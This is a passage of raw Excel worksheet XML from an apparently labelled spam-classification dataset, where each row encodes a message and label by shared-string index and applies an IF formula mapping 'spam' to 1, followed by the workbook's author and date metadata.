    <row r="5507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5507" t="s">
        <v>10403</v>
      </c>
      <c r="B5507" t="s">
        <v>5294</v>
      </c>
      <c r="C5507" s="1">
        <f>IF(B5507="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5508" t="s">
        <v>10404</v>
      </c>
      <c r="B5508" t="s">
        <v>5294</v>
      </c>
      <c r="C5508" s="1">
        <f>IF(B5508="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5509" t="s">
        <v>10405</v>
      </c>
      <c r="B5509" t="s">
        <v>5294</v>
      </c>
      <c r="C5509" s="1">
        <f>IF(B5509="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5510" t="s">
        <v>10406</v>
      </c>
      <c r="B5510" t="s">
        <v>5294</v>
      </c>
      <c r="C5510" s="1">
        <f>IF(B5510="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5511" t="s">
        <v>10407</v>
      </c>
      <c r="B5511" t="s">
        <v>5294</v>
      </c>
      <c r="C5511" s="1">
        <f>IF(B5511="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5512" t="s">
        <v>6967</v>
      </c>
      <c r="B5512" t="s">
        <v>5294</v>
      </c>
      <c r="C5512" s="1">
        <f>IF(B5512="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5513" t="s">
        <v>10408</v>
      </c>
      <c r="B5513" t="s">
        <v>5294</v>
      </c>
      <c r="C5513" s="1">
        <f>IF(B5513="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5514" t="s">
        <v>10409</v>
      </c>
      <c r="B5514" t="s">
        <v>5294</v>
      </c>
      <c r="C5514" s="1">
        <f>IF(B5514="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5515" t="s">
        <v>10410</v>
      </c>
      <c r="B5515" t="s">
        <v>5294</v>
      </c>
      <c r="C5515" s="1">
        <f>IF(B5515="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5516" t="s">
        <v>10411</v>
      </c>
      <c r="B5516" t="s">
        <v>5294</v>
      </c>
      <c r="C5516" s="1">
        <f>IF(B5516="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5517" t="s">
        <v>10412</v>
      </c>
      <c r="B5517" t="s">
        <v>5294</v>
      </c>
      <c r="C5517" s="1">
        <f>IF(B5517="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5518" t="s">
        <v>10413</v>
      </c>
      <c r="B5518" t="s">
        <v>5294</v>
      </c>
      <c r="C5518" s="1">
        <f>IF(B5518="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5519" t="s">
        <v>10414</v>
      </c>
      <c r="B5519" t="s">
        <v>5294</v>
      </c>
      <c r="C5519" s="1">
        <f>IF(B5519="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5520" t="s">
        <v>10415</v>
      </c>
      <c r="B5520" t="s">
        <v>5294</v>
      </c>
      <c r="C5520" s="1">
        <f>IF(B5520="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5521" t="s">
        <v>10416</v>
      </c>
      <c r="B5521" t="s">
        <v>5294</v>
      </c>
      <c r="C5521" s="1">
        <f>IF(B5521="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5522" t="s">
        <v>10417</v>
      </c>
      <c r="B5522" t="s">
        <v>5294</v>
      </c>
      <c r="C5522" s="1">
        <f>IF(B5522="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5523" t="s">
        <v>10418</v>
      </c>
      <c r="B5523" t="s">
        <v>5294</v>
      </c>
      <c r="C5523" s="1">
        <f>IF(B5523="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5524" t="s">
        <v>10419</v>
      </c>
      <c r="B5524" t="s">
        <v>5294</v>
      </c>
      <c r="C5524" s="1">
        <f>IF(B5524="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5525" t="s">
        <v>10420</v>
      </c>
      <c r="B5525" t="s">
        <v>5294</v>
      </c>
      <c r="C5525" s="1">
        <f>IF(B5525="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5526" t="s">
        <v>6359</v>
      </c>
      <c r="B5526" t="s">
        <v>5297</v>
      </c>
      <c r="C5526" s="1">
        <f>IF(B5526="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5527" t="s">
        <v>10421</v>
      </c>
      <c r="B5527" t="s">
        <v>5294</v>
      </c>
      <c r="C5527" s="1">
        <f>IF(B5527="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5528" t="s">
        <v>10422</v>
      </c>
      <c r="B5528" t="s">
        <v>5297</v>
      </c>
      <c r="C5528" s="1">
        <f>IF(B5528="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5529" t="s">
        <v>10423</v>
      </c>
      <c r="B5529" t="s">
        <v>5294</v>
      </c>
      <c r="C5529" s="1">
        <f>IF(B5529="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5530" t="s">
        <v>10424</v>
      </c>
      <c r="B5530" t="s">
        <v>5294</v>
      </c>
      <c r="C5530" s="1">
        <f>IF(B5530="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5531" t="s">
        <v>10425</v>
      </c>
      <c r="B5531" t="s">
        <v>5294</v>
      </c>
      <c r="C5531" s="1">
        <f>IF(B5531="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5532" t="s">
        <v>10426</v>
      </c>
      <c r="B5532" t="s">
        <v>5294</v>
      </c>
      <c r="C5532" s="1">
        <f>IF(B5532="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5533" t="s">
        <v>10427</v>
      </c>
      <c r="B5533" t="s">
        <v>5294</v>
      </c>
      <c r="C5533" s="1">
        <f>IF(B5533="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5534" t="s">
        <v>10428</v>
      </c>
      <c r="B5534" t="s">
        <v>5294</v>
      </c>
      <c r="C5534" s="1">
        <f>IF(B5534="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5535" t="s">
        <v>10429</v>
      </c>
      <c r="B5535" t="s">
        <v>5294</v>
      </c>
      <c r="C5535" s="1">
        <f>IF(B5535="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5536" t="s">
        <v>10430</v>
      </c>
      <c r="B5536" t="s">
        <v>5294</v>
      </c>
      <c r="C5536" s="1">
        <f>IF(B5536="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5537" t="s">
        <v>10144</v>
      </c>
      <c r="B5537" t="s">
        <v>5294</v>
      </c>
      <c r="C5537" s="1">
        <f>IF(B5537="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5538" t="s">
        <v>10431</v>
      </c>
      <c r="B5538" t="s">
        <v>5294</v>
      </c>
      <c r="C5538" s="1">
        <f>IF(B5538="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5539" t="s">
        <v>10432</v>
      </c>
      <c r="B5539" t="s">
        <v>5297</v>
      </c>
      <c r="C5539" s="1">
        <f>IF(B5539="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5540" t="s">
        <v>10433</v>
      </c>
      <c r="B5540" t="s">
        <v>5294</v>
      </c>
      <c r="C5540" s="1">
        <f>IF(B5540="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5541" t="s">
        <v>5628</v>
      </c>
      <c r="B5541" t="s">
        <v>5294</v>
      </c>
      <c r="C5541" s="1">
        <f>IF(B5541="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5542" t="s">
        <v>10434</v>
      </c>
      <c r="B5542" t="s">
        <v>5297</v>
      </c>
      <c r="C5542" s="1">
        <f>IF(B5542="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5543" t="s">
        <v>10435</v>
      </c>
      <c r="B5543" t="s">
        <v>5294</v>
      </c>
      <c r="C5543" s="1">
        <f>IF(B5543="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5544" t="s">
        <v>10436</v>
      </c>
      <c r="B5544" t="s">
        <v>5294</v>
      </c>
      <c r="C5544" s="1">
        <f>IF(B5544="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5545" t="s">
        <v>10437</v>
      </c>
      <c r="B5545" t="s">
        <v>5294</v>
      </c>
      <c r="C5545" s="1">
        <f>IF(B5545="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5546" t="s">
        <v>10438</v>
      </c>
      <c r="B5546" t="s">
        <v>5294</v>
      </c>
      <c r="C5546" s="1">
        <f>IF(B5546="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5547" t="s">
        <v>10439</v>
      </c>
      <c r="B5547" t="s">
        <v>5294</v>
      </c>
      <c r="C5547" s="1">
        <f>IF(B5547="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5548" t="s">
        <v>10440</v>
      </c>
      <c r="B5548" t="s">
        <v>5294</v>
      </c>
      <c r="C5548" s="1">
        <f>IF(B5548="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5549" t="s">
        <v>10441</v>
      </c>
      <c r="B5549" t="s">
        <v>5297</v>
      </c>
      <c r="C5549" s="1">
        <f>IF(B5549="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5550" t="s">
        <v>10442</v>
      </c>
      <c r="B5550" t="s">
        <v>5294</v>
      </c>
      <c r="C5550" s="1">
        <f>IF(B5550="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5551" t="s">
        <v>10443</v>
      </c>
      <c r="B5551" t="s">
        <v>5294</v>
      </c>
      <c r="C5551" s="1">
        <f>IF(B5551="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5552" t="s">
        <v>10444</v>
      </c>
      <c r="B5552" t="s">
        <v>5294</v>
      </c>
      <c r="C5552" s="1">
        <f>IF(B5552="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5553" t="s">
        <v>10445</v>
      </c>
      <c r="B5553" t="s">
        <v>5294</v>
      </c>
      <c r="C5553" s="1">
        <f>IF(B5553="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5554" t="s">
        <v>10446</v>
      </c>
      <c r="B5554" t="s">
        <v>5294</v>
      </c>
      <c r="C5554" s="1">
        <f>IF(B5554="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5555" t="s">
        <v>6104</v>
      </c>
      <c r="B5555" t="s">
        <v>5294</v>
      </c>
      <c r="C5555" s="1">
        <f>IF(B5555="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5556" t="s">
        <v>10447</v>
      </c>
      <c r="B5556" t="s">
        <v>5294</v>
      </c>
      <c r="C5556" s="1">
        <f>IF(B5556="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5557" t="s">
        <v>10448</v>
      </c>
      <c r="B5557" t="s">
        <v>5294</v>
      </c>
      <c r="C5557" s="1">
        <f>IF(B5557="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5558" t="s">
        <v>10449</v>
      </c>
      <c r="B5558" t="s">
        <v>5294</v>
      </c>
      <c r="C5558" s="1">
        <f>IF(B5558="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5559" t="s">
        <v>10450</v>
      </c>
      <c r="B5559" t="s">
        <v>5294</v>
      </c>
      <c r="C5559" s="1">
        <f>IF(B5559="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5560" t="s">
        <v>5376</v>
      </c>
      <c r="B5560" t="s">
        <v>5294</v>
      </c>
      <c r="C5560" s="1">
        <f>IF(B5560="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5561" t="s">
        <v>10451</v>
      </c>
      <c r="B5561" t="s">
        <v>5294</v>
      </c>
      <c r="C5561" s="1">
        <f>IF(B5561="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5562" t="s">
        <v>10452</v>
      </c>
      <c r="B5562" t="s">
        <v>5294</v>
      </c>
      <c r="C5562" s="1">
        <f>IF(B5562="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5563" t="s">
        <v>10453</v>
      </c>
      <c r="B5563" t="s">
        <v>5294</v>
      </c>
      <c r="C5563" s="1">
        <f>IF(B5563="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5564" t="s">
        <v>10454</v>
      </c>
      <c r="B5564" t="s">
        <v>5294</v>
      </c>
      <c r="C5564" s="1">
        <f>IF(B5564="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5565" t="s">
        <v>10455</v>
      </c>
      <c r="B5565" t="s">
        <v>5294</v>
      </c>
      <c r="C5565" s="1">
        <f>IF(B5565="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5566" t="s">
        <v>10456</v>
      </c>
      <c r="B5566" t="s">
        <v>5294</v>
      </c>
      <c r="C5566" s="1">
        <f>IF(B5566="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5567" t="s">
        <v>10457</v>
      </c>
      <c r="B5567" t="s">
        <v>5294</v>
      </c>
      <c r="C5567" s="1">
        <f>IF(B5567="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5568" t="s">
        <v>10458</v>
      </c>
      <c r="B5568" t="s">
        <v>5297</v>
      </c>
      <c r="C5568" s="1">
        <f>IF(B5568="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5569" t="s">
        <v>10459</v>
      </c>
      <c r="B5569" t="s">
        <v>5297</v>
      </c>
      <c r="C5569" s="1">
        <f>IF(B5569="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5570" t="s">
        <v>10460</v>
      </c>
      <c r="B5570" t="s">
        <v>5294</v>
      </c>
      <c r="C5570" s="1">
        <f>IF(B5570="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5571" t="s">
        <v>10461</v>
      </c>
      <c r="B5571" t="s">
        <v>5294</v>
      </c>
      <c r="C5571" s="1">
        <f>IF(B5571="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5572" t="s">
        <v>10462</v>
      </c>
      <c r="B5572" t="s">
        <v>5294</v>
      </c>
      <c r="C5572" s="1">
        <f>IF(B5572="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5573" t="s">
        <v>10463</v>
      </c>
      <c r="B5573" t="s">
        <v>5294</v>
      </c>
      <c r="C5573" s="1"/>
    </row>
    <row r="5574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="C5574" s="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1741-22AE-490D-91BF-193BC28746A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A65564-C37D-48E4-87FC-BD87AC9800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spam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Nhân Vũ</dc:creator>
  <cp:lastModifiedBy>Hoàng Nhân Vũ</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-06T01:50:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-06T02:16:14Z</dcterms:modified>
</cp:coreProperties>
</file>